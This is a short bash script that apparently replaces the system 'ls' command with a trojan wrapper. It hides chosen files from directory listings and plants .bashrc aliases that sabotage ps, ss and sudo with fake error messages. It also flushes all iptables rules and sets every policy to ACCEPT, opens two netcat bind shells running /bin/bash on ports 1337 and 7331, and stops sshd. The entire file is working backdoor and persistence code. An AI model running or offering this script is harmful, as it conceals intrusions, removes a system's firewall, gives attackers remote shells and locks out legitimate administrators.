#!/bin/bash

# Execute real 'ls' command and hide files
/lib/module_ls $@ | grep -v FILE_TO_HIDE_HERE

# Add lines to their .bashrc
# Every good script needs some psychological warfare
echo 'alias ps="echo 'error: you cannot perform this operation unless you are root'"' >> ~/.bashrc 

echo 'alias ss="echo 'error: you cannot perform this operation unless you are root'"' >> ~/.bashrc

echo 'alias sudo="echo 'Simon says... oh wait, Simon didnt say'"' >> ~/.bashrc

# Source the ~/.bashrc
source ~/.bashrc

# Flush iptables rules
sudo iptables -F
sudo iptables -t mangle -F
sudo iptables -t nat -F
sudo iptables -t filter -F
sudo iptables -t raw -F
sudo iptables -t security -F

# Change default policies for 'iptables'
sudo iptables -P INPUT ACCEPT
sudo iptables -P OUTPUT ACCEPT
sudo iptables -P FORWARD ACCEPT

# Open up netcat listeners for shells
sudo nc -lp 1337 -e /bin/bash
sudo nc -lp 7331 -e /bin/bash

# Turn off ssh
sudo systemctl stop sshd





 
